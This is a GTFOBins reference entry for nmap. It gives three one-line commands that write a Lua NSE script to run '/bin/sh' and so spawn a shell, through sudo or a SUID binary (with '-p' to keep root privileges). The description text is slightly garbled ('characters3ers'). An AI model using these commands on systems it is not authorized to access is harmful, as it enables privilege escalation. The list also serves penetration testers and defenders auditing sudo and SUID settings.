GTFOBins.github.io/_gtfobins/nmap.md

601 B

functions
execute-non-interactive sudo-enabled suid-enabled
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh")' > /tmp/script.nse nmap --script=/tmp/script.nse
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh")' > /tmp/script.nse sudo nmap --script=/tmp/script.nse
description code
Echoing of input characters3ers is disabled. echo 'os.execute("/bin/sh -p")' > /tmp/script.nse ./nmap --script=/tmp/script.nse